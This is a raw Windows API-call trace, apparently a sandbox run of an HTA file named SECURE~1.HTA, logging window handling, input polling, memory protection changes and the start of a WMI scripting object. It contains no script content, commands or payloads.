[0039.185] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.185] LoadLibraryExA (lpLibFileName="d3d11.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb37c90000
[0039.185] GetProcAddress (hModule=0x7ffb37c90000, lpProcName="D3D11CreateDevice") returned 0x7ffb37ca7fa0
[0039.185] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2d1f0 | out: lpflOldProtect=0xb8a8a2d1f0*=0x4) returned 1
[0039.185] D3D11CreateDevice () returned 0x0
[0039.276] GetTickCount () returned 0x1c4d1
[0039.291] WTSGetActiveConsoleSessionId () returned 0x1
[0039.292] _vsnwprintf (in: _Buffer=0xb8a8a2cde0, _BufferCount=0x18f, _Format="vendorId=\"0x%x\",deviceID=\"0x%x\",subSysID=\"0x%x\",revision=\"0x%x\",version=\"%d.%d.%d.%d\"hypervisor=\"%s (%s)\"", _ArgList=0xb8a8a2cd78 | out: _Buffer="vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"6.2.10240.16384\"hypervisor=\"No Hypervisor (No SLAT)\"") returned 125
[0039.292] wcsncmp (_String1="vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.10240.16384\"hypervisor=\"No Hypervisor (No SLAT)\"", _String2="vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"6.2.10240.16384\"hypervisor=\"No Hypervisor (No SLAT)\"", _MaxCount=0x190) returned -5
[0039.310] GetACP () returned 0x4e4
[0039.310] _ultow_s (in: _Value=0x4e4, _Buffer=0xb8a8a2d762, _BufferCount=0xb, _Radix=10 | out: _Buffer="1252") returned 0x0
[0039.310] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="EUDC\\1252", ulOptions=0x0, samDesired=0x20019, phkResult=0xb8a8a2d740 | out: phkResult=0xb8a8a2d740*=0x0) returned 0x2
[0039.314] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.314] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x2c) returned 0x7ffb2dce1c40
[0039.314] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e5b0 | out: lpflOldProtect=0xb8a8a2e5b0*=0x4) returned 1
[0039.315] LsQueryLineDup () returned 0x0
[0039.316] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.316] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x5) returned 0x7ffb2dcdc1d0
[0039.316] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e780 | out: lpflOldProtect=0xb8a8a2e780*=0x4) returned 1
[0039.316] LsDestroyLine () returned 0x0
[0039.317] memcpy_s (in: _Destination=0xb8a8a2eeb0, _DestinationSize=0x74, _Source=0xb8a8a2eca0, _SourceSize=0x74 | out: _Destination=0xb8a8a2eeb0) returned 0x0
[0039.318] GetFocus () returned 0x70064
[0039.318] GetFocus () returned 0x70064
[0039.318] GetCursorPos (in: lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000*(x=1287, y=746)) returned 1
[0039.318] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000) returned 1
[0039.318] GetKeyState (nVirtKey=16) returned 0
[0039.318] GetKeyState (nVirtKey=17) returned 0
[0039.318] GetKeyState (nVirtKey=18) returned 0
[0039.318] GetKeyState (nVirtKey=160) returned 0
[0039.318] GetKeyState (nVirtKey=162) returned 0
[0039.318] GetKeyState (nVirtKey=164) returned 0
[0039.318] GetCapture () returned 0x0
[0039.318] memcpy_s (in: _Destination=0xc0aaadc9e0, _DestinationSize=0x18, _Source=0xb8a8a2e738, _SourceSize=0x18 | out: _Destination=0xc0aaadc9e0) returned 0x0
[0039.318] GetCurrentThreadId () returned 0x210
[0039.318] GetCurrentThreadId () returned 0x210
[0039.318] GetFocus () returned 0x70064
[0039.318] GetCursorPos (in: lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000*(x=1287, y=746)) returned 1
[0039.318] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000) returned 1
[0039.319] GetKeyState (nVirtKey=16) returned 0
[0039.319] GetKeyState (nVirtKey=17) returned 0
[0039.319] GetKeyState (nVirtKey=18) returned 0
[0039.319] GetKeyState (nVirtKey=160) returned 0
[0039.319] GetKeyState (nVirtKey=162) returned 0
[0039.319] GetKeyState (nVirtKey=164) returned 0
[0039.319] memcpy_s (in: _Destination=0xc0aaadca00, _DestinationSize=0x18, _Source=0xb8a8a2e738, _SourceSize=0x18 | out: _Destination=0xc0aaadca00) returned 0x0
[0039.319] GetCurrentThreadId () returned 0x210
[0039.319] GetCurrentThreadId () returned 0x210
[0039.319] GetCursorPos (in: lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000*(x=1287, y=746)) returned 1
[0039.319] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000) returned 1
[0039.319] GetKeyState (nVirtKey=16) returned 0
[0039.319] GetKeyState (nVirtKey=17) returned 0
[0039.319] GetKeyState (nVirtKey=18) returned 0
[0039.319] GetKeyState (nVirtKey=160) returned 0
[0039.319] GetKeyState (nVirtKey=162) returned 0
[0039.319] GetKeyState (nVirtKey=164) returned 0
[0039.319] GetCapture () returned 0x0
[0039.320] memcpy_s (in: _Destination=0xc0aaadca20, _DestinationSize=0x18, _Source=0xb8a8a2e738, _SourceSize=0x18 | out: _Destination=0xc0aaadca20) returned 0x0
[0039.320] GetCurrentThreadId () returned 0x210
[0039.320] GetCurrentThreadId () returned 0x210
[0039.320] GetCursorPos (in: lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000*(x=1287, y=746)) returned 1
[0039.320] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000) returned 1
[0039.320] GetKeyState (nVirtKey=16) returned 0
[0039.320] GetKeyState (nVirtKey=17) returned 0
[0039.320] GetKeyState (nVirtKey=18) returned 0
[0039.320] GetKeyState (nVirtKey=160) returned 0
[0039.320] GetKeyState (nVirtKey=162) returned 0
[0039.320] GetKeyState (nVirtKey=164) returned 0
[0039.320] GetCapture () returned 0x0
[0039.320] memcpy_s (in: _Destination=0xc0aaadca40, _DestinationSize=0x18, _Source=0xb8a8a2e738, _SourceSize=0x18 | out: _Destination=0xc0aaadca40) returned 0x0
[0039.320] GetCurrentThreadId () returned 0x210
[0039.320] GetCurrentThreadId () returned 0x210
[0039.320] GetCursorPos (in: lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000*(x=1287, y=746)) returned 1
[0039.320] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000) returned 1
[0039.320] GetKeyState (nVirtKey=16) returned 0
[0039.320] GetKeyState (nVirtKey=17) returned 0
[0039.320] GetKeyState (nVirtKey=18) returned 0
[0039.320] GetKeyState (nVirtKey=160) returned 0
[0039.320] GetKeyState (nVirtKey=162) returned 0
[0039.321] GetKeyState (nVirtKey=164) returned 0
[0039.321] memcpy_s (in: _Destination=0xc0aaadca60, _DestinationSize=0x18, _Source=0xb8a8a2e738, _SourceSize=0x18 | out: _Destination=0xc0aaadca60) returned 0x0
[0039.321] GetCurrentThreadId () returned 0x210
[0039.321] GetCurrentThreadId () returned 0x210
[0039.321] GetCursorPos (in: lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000*(x=1287, y=746)) returned 1
[0039.321] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f000 | out: lpPoint=0xb8a8a2f000) returned 1
[0039.321] GetKeyState (nVirtKey=16) returned 0
[0039.321] GetKeyState (nVirtKey=17) returned 0
[0039.321] GetKeyState (nVirtKey=18) returned 0
[0039.321] GetKeyState (nVirtKey=160) returned 0
[0039.321] GetKeyState (nVirtKey=162) returned 0
[0039.321] GetKeyState (nVirtKey=164) returned 0
[0039.321] memcpy_s (in: _Destination=0xc0aaadca80, _DestinationSize=0x18, _Source=0xb8a8a2e738, _SourceSize=0x18 | out: _Destination=0xc0aaadca80) returned 0x0
[0039.322] GetCurrentThreadId () returned 0x210
[0039.322] GetCurrentThreadId () returned 0x210
[0039.322] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0xb8a8c39740, hWnd=0x70064, phIMC=0xb8a8a2f750 | out: phIMC=0xb8a8a2f750*=0x1a00f1) returned 0x0
[0039.322] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0xb8a8c39740, hWnd=0x70064, hIME=0x0, phPrev=0xb8a8a2f750 | out: phPrev=0xb8a8a2f750*=0x1a00f1) returned 0x0
[0039.322] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0039.322] GetKeyState (nVirtKey=1) returned 0
[0039.322] GetKeyState (nVirtKey=2) returned 0
[0039.322] GetKeyState (nVirtKey=16) returned 0
[0039.323] GetKeyState (nVirtKey=17) returned 0
[0039.323] GetKeyState (nVirtKey=4) returned 0
[0039.323] GetKeyState (nVirtKey=18) returned 0
[0039.323] GetMessageTime () returned 114187
[0039.323] GetMessagePos () returned 0x1da031f
[0039.323] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0xb8a8a2f038 | out: plResult=0xb8a8a2f038) returned 0x0
[0039.323] GetCurrentThreadId () returned 0x210
[0039.323] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0039.323] GetKeyState (nVirtKey=1) returned 0
[0039.323] GetKeyState (nVirtKey=2) returned 0
[0039.323] GetKeyState (nVirtKey=16) returned 0
[0039.323] GetKeyState (nVirtKey=17) returned 0
[0039.323] GetKeyState (nVirtKey=4) returned 0
[0039.323] GetKeyState (nVirtKey=18) returned 0
[0039.323] GetMessageTime () returned 114187
[0039.323] GetMessagePos () returned 0x1da031f
[0039.324] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0xb8a8c39740, hWnd=0x70064, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0xb8a8a2f038 | out: plResult=0xb8a8a2f038) returned 0x0
[0039.324] GetCurrentThreadId () returned 0x210
[0039.324] CActiveIMMAppEx_Trident:IActiveIMMApp:ReleaseContext (This=0xb8a8c39740, hWnd=0x70064, hIMC=0x1a00f1) returned 0x0
[0039.324] GetFocus () returned 0x70064
[0039.324] GetFocus () returned 0x70064
[0039.324] StrCmpICW (pszStr1="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pszStr2="about:blank") returned 5
[0039.324] ParseURLW (in: pcszURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppu=0xb8a8a2f5c0 | out: ppu=0xb8a8a2f5c0) returned 0x0
[0039.324] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x6
[0039.325] IUri:GetAbsoluteUri (in: This=0xb8a8c431a0, pbstrAbsoluteUri=0xb8a8a2f6d8 | out: pbstrAbsoluteUri=0xb8a8a2f6d8*="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x0
[0039.325] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0039.325] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.325] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x201) returned 0x7ffb2eae0da0
[0039.325] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f4c0 | out: lpflOldProtect=0xb8a8a2f4c0*=0x4) returned 1
[0039.553] GetCurrentThreadId () returned 0x210
[0039.553] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.553] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="ShouldShowIntranetWarningSecband") returned 0x7ffb2eaaceb0
[0039.553] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f4f0 | out: lpflOldProtect=0xb8a8a2f4f0*=0x4) returned 1
[0039.553] ShouldShowIntranetWarningSecband () returned 0x0
[0039.554] GetIUriPriv () returned 0x0
[0039.554] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0039.554] IUnknown:QueryInterface (in: This=0xb8a8c431a0, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2f480 | out: ppvObject=0xb8a8a2f480*=0xb8a8c431a0) returned 0x0
[0039.554] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0039.554] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x6
[0039.554] IUnknown:QueryInterface (in: This=0xb8a8c431a0, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2f480 | out: ppvObject=0xb8a8a2f480*=0xb8a8c431a0) returned 0x0
[0039.554] IUnknown:Release (This=0xb8a8c431a0) returned 0x6
[0039.554] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x7
[0039.554] IUnknown:Release (This=0xb8a8c431a0) returned 0x6
[0039.554] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0039.554] GetCursorPos (in: lpPoint=0xb8a8a2f310 | out: lpPoint=0xb8a8a2f310*(x=1287, y=746)) returned 1
[0039.554] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f310 | out: lpPoint=0xb8a8a2f310) returned 1
[0039.554] GetKeyState (nVirtKey=16) returned 0
[0039.554] GetKeyState (nVirtKey=17) returned 0
[0039.554] GetKeyState (nVirtKey=18) returned 0
[0039.554] GetKeyState (nVirtKey=160) returned 0
[0039.554] GetKeyState (nVirtKey=162) returned 0
[0039.554] GetKeyState (nVirtKey=164) returned 0
[0039.555] GetCurrentThreadId () returned 0x210
[0039.555] GetCurrentThreadId () returned 0x210
[0039.555] GetCurrentThreadId () returned 0x210
[0039.555] LoadStringW (in: hInstance=0x7ffb223a0000, uID=0x1fe9, lpBuffer=0xb8a8a2f4d0, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4
[0039.555] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x6
[0039.555] IUri:GetScheme (in: This=0xb8a8c431a0, pdwScheme=0xb8a8a2e7c0 | out: pdwScheme=0xb8a8a2e7c0*=0x9) returned 0x0
[0039.555] IUnknown:QueryInterface (in: This=0xb8a8c431a0, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2e740 | out: ppvObject=0xb8a8a2e740*=0xb8a8c431a0) returned 0x0
[0039.555] IUnknown:Release (This=0xb8a8c431a0) returned 0x6
[0039.555] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x7
[0039.555] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pszPath=0xb8a8a2e830, pcchPath=0xb8a8a2e7f0, dwFlags=0x0 | out: pszPath="C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA", pcchPath=0xb8a8a2e7f0) returned 0x0
[0039.555] IUnknown:Release (This=0xb8a8c431a0) returned 0x6
[0039.555] GetWindowTextW (in: hWnd=0x50226, lpString=0xb8a8a2e340, nMaxCount=512 | out: lpString="") returned 0
[0039.555] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0xd, wParam=0x200, lParam=0xb8a8a2e340) returned 0x0
[0039.556] SetWindowTextW (hWnd=0x50226, lpString="C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA") returned 1
[0039.556] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0xc, wParam=0x0, lParam=0xb8a8ccbc94) returned 0x1
[0039.556] IUnknown:Release (This=0xb8a8c431a0) returned 0x5
[0039.556] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0039.556] SendMessageW (hWnd=0x5016e, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0039.556] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0039.557] SendMessageW (hWnd=0x50226, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0
[0039.557] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0
[0039.557] SetWindowLongW (hWnd=0x50226, nIndex=-16, dwNewLong=-2100363264) returned -2033254400
[0039.557] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7c, wParam=0xfffffffffffffff0, lParam=0xb8a8a2f230) returned 0x0
[0039.557] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7d, wParam=0xfffffffffffffff0, lParam=0xb8a8a2f230) returned 0x0
[0039.557] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10027
[0039.558] SetWindowLongW (hWnd=0x50226, nIndex=-20, dwNewLong=262144) returned 262400
[0039.558] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7c, wParam=0xffffffffffffffec, lParam=0xb8a8a2f230) returned 0x0
[0039.558] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7d, wParam=0xffffffffffffffec, lParam=0xb8a8a2f230) returned 0x0
[0039.558] SetWindowPos (hWnd=0x50226, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0039.558] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x46, wParam=0x0, lParam=0xb8a8a2f240) returned 0x0
[0039.558] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x83, wParam=0x1, lParam=0xb8a8a2f210) returned 0x0
[0039.558] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x47, wParam=0x0, lParam=0xb8a8a2f240) returned 0x0
[0039.559] GlobalAddAtomW (lpString=0x0) returned 0x0
[0039.559] SetPropW (hWnd=0x5016e, lpString=0x0, hData=0x5016e) returned 0
[0039.559] ShowWindow (hWnd=0x50226, nCmdShow=1) returned 0
[0039.559] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0039.559] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x46, wParam=0x0, lParam=0xb8a8a2f1f0) returned 0x0
[0039.559] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x46, wParam=0x0, lParam=0xb8a8a2f1f0) returned 0x0
[0039.577] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0
[0039.577] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x14, wParam=0x401017e, lParam=0x0) returned 0x1
[0039.577] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0039.577] GetCurrentThreadId () returned 0x210
[0039.578] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0039.578] WindowFromDC (hDC=0x901076b) returned 0x70064
[0039.578] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x47, wParam=0x0, lParam=0xb8a8a2f1f0) returned 0x0
[0039.578] GetClientRect (in: hWnd=0x50226, lpRect=0xb8a8a2ef00 | out: lpRect=0xb8a8a2ef00) returned 1
[0039.580] GetClientRect (in: hWnd=0x50226, lpRect=0xb8a8a2ef50 | out: lpRect=0xb8a8a2ef50) returned 1
[0039.580] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x3, wParam=0x0, lParam=0xa1008a) returned 0x0
[0039.580] UpdateWindow (hWnd=0x50226) returned 1
[0039.580] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0xf, wParam=0x0, lParam=0x0) returned 0x0
[0039.580] GetWindowLongPtrW (hWnd=0x70064, nIndex=-21) returned 0xc0aab08000
[0039.580] MapWindowPoints (in: hWndFrom=0x70064, hWndTo=0x0, lpPoints=0xb8a8a2ec50, cPoints=0x1 | out: lpPoints=0xb8a8a2ec50) returned 10551434
[0039.580] BeginPaint (in: hWnd=0x70064, lpPaint=0xb8a8a2ec60 | out: lpPaint=0xb8a8a2ec60) returned 0x901076b
[0039.581] GetModuleHandleW (lpModuleName="user32.dll") returned 0x7ffb3c650000
[0039.581] GetProcAddress (hModule=0x7ffb3c650000, lpProcName="IsWindowRedirectedForPrint") returned 0x7ffb3c6731d0
[0039.581] IsWindowRedirectedForPrint () returned 0x0
[0039.581] GetAncestor (hwnd=0x70064, gaFlags=0x1) returned 0x50226
[0039.581] IsWindowRedirectedForPrint () returned 0x0
[0039.581] GetAncestor (hwnd=0x50226, gaFlags=0x1) returned 0x10010
[0039.581] IsWindowRedirectedForPrint () returned 0x0
[0039.581] GetAncestor (hwnd=0x10010, gaFlags=0x1) returned 0x0
[0039.581] CreateRectRgnIndirect (lprect=0xb8a8a2eb50) returned 0xb040797
[0039.581] GetRandomRgn (hdc=0x901076b, hrgn=0xb040797, i=4) returned 1
[0039.581] OffsetRgn (hrgn=0xb040797, x=-138, y=-161) returned 2
[0039.581] MapWindowPoints (in: hWndFrom=0x70064, hWndTo=0x0, lpPoints=0xb8a8a2eb50, cPoints=0x1 | out: lpPoints=0xb8a8a2eb50) returned 10551434
[0039.581] GetRegionData (in: hrgn=0xb040797, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30
[0039.581] GetRegionData (in: hrgn=0xb040797, nCount=0x30, lpRgnData=0xb8a8ce02e0 | out: lpRgnData=0xb8a8ce02e0) returned 0x30
[0039.581] GetClientRect (in: hWnd=0x70064, lpRect=0xb8a8a2ea58 | out: lpRect=0xb8a8a2ea58) returned 1
[0039.581] DeleteObject (ho=0xb040797) returned 1
[0039.582] EndPaint (hWnd=0x70064, lpPaint=0xb8a8a2ec60) returned 1
[0039.582] GetCurrentThreadId () returned 0x210
[0039.582] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0039.582] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0039.582] _wcsicmp (_String1="window", _String2="window") returned 0
[0039.582] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.582] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.582] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.582] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0039.582] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0039.582] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0039.582] VerifyVersionInfoW (in: lpVersionInformation=0xb8a8a2c320, dwTypeMask=0x23, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0xb8a8a2c320) returned 0
[0039.582] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x203000, flProtect=0x4) returned 0xc0ad0c0000
[0039.583] VirtualAlloc (lpAddress=0xb8b6a7d000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0xb8b6a7d000
[0039.583] _wcsicmp (_String1="window", _String2="window") returned 0
[0039.584] wcscpy_s (in: _Destination=0xc0aa9f69c0, _SizeInWords=0x7, _Source="window" | out: _Destination="window") returned 0x0
[0039.584] GetCursorPos (in: lpPoint=0xb8a8a2f030 | out: lpPoint=0xb8a8a2f030*(x=1287, y=746)) returned 1
[0039.584] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2f030 | out: lpPoint=0xb8a8a2f030) returned 1
[0039.584] GetKeyState (nVirtKey=16) returned 0
[0039.584] GetKeyState (nVirtKey=17) returned 0
[0039.584] GetKeyState (nVirtKey=18) returned 0
[0039.584] GetKeyState (nVirtKey=160) returned 0
[0039.584] GetKeyState (nVirtKey=162) returned 0
[0039.584] GetKeyState (nVirtKey=164) returned 0
[0039.584] GetCurrentThreadId () returned 0x210
[0039.585] GetCurrentThreadId () returned 0x210
[0039.585] GetFocus () returned 0x70064
[0039.585] GetCursorPos (in: lpPoint=0xb8a8a2efe0 | out: lpPoint=0xb8a8a2efe0*(x=1287, y=746)) returned 1
[0039.585] ScreenToClient (in: hWnd=0x70064, lpPoint=0xb8a8a2efe0 | out: lpPoint=0xb8a8a2efe0) returned 1
[0039.585] GetKeyState (nVirtKey=16) returned 0
[0039.585] GetKeyState (nVirtKey=17) returned 0
[0039.585] GetKeyState (nVirtKey=18) returned 0
[0039.585] GetKeyState (nVirtKey=160) returned 0
[0039.585] GetKeyState (nVirtKey=162) returned 0
[0039.585] GetKeyState (nVirtKey=164) returned 0
[0039.585] memcpy_s (in: _Destination=0xc0aaadcaa0, _DestinationSize=0x18, _Source=0xb8a8a2ed08, _SourceSize=0x18 | out: _Destination=0xc0aaadcaa0) returned 0x0
[0039.586] ISystemDebugEventFire:IsActive (This=0xb8a8c49390) returned 0x1
[0039.586] GetCurrentThreadId () returned 0x210
[0039.586] CLSIDFromProgIDEx (in: lpszProgID="WbemScripting.SWbemLocator", lpclsid=0xb8a8a2df20 | out: lpclsid=0xb8a8a2df20*(Data1=0x76a64158, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6))) returned 0x0
[0039.587] SysStringLen (param_1=0x0) returned 0x0
[0039.587] CoGetClassObject (in: rclsid=0xb8a8a2df20*(Data1=0x76a64158, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffb25138d58*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xb8a8a2dee0 | out: ppv=0xb8a8a2dee0*=0xb8a8c75a80) returned 0x0
[0039.735] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8c75a80
[0039.745] GetVersionExW (in: lpVersionInformation=0xb8a8a2dcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0xc0, dwBuildNumber=0x46000000, dwPlatformId=0x76a64158, szCSDVersion="쭁ᇑʋ怀؈뛙") | out: lpVersionInformation=0xb8a8a2dcd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0039.745] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0xb8a8a2dcc0 | out: phkResult=0xb8a8a2dcc0*=0x4e4) returned 0x0
[0039.745] RegQueryValueExW (in: hKey=0x4e4, lpValueName="Default Impersonation Level", lpReserved=0x0, lpType=0x0, lpData=0xb8a8a2dcb0, lpcbData=0xb8a8a2dcb4*=0x4 | out: lpType=0x0, lpData=0xb8a8a2dcb0*=0x3, lpcbData=0xb8a8a2dcb4*=0x4) returned 0x0
[0039.745] RegCloseKey (hKey=0x4e4) returned 0x0
[0039.745] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xb8a8ce4650
[0039.745] GetSystemDirectoryW (in: lpBuffer=0xb8a8ce4650, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0039.745] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb3c2d0000
[0039.745] GetProcAddress (hModule=0x7ffb3c2d0000, lpProcName="DuplicateTokenEx") returned 0x7ffb3c2e8f80
[0039.745] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
